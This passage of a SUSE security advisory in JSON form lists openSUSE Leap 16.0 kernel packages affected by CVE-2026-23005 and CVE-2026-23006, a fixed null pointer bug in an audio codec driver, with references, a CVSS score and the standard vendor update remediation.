"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2026-23005"
},
{
"cve": "CVE-2026-23006",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-23006"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nASoC: tlv320adcx140: fix null pointer\n\nThe \"snd_soc_component\" in \"adcx140_priv\" was only used once but never\nset. It was only used for reaching \"dev\" which is already present in\n\"adcx140_priv\".",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-23006",
"url": "https://www.suse.com/security/cve/CVE-2026-23006"
},
{
"category": "external",
"summary": "SUSE Bug 1257208 for CVE-2026-23006",
"url": "https://bugzilla.suse.com/1257208"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
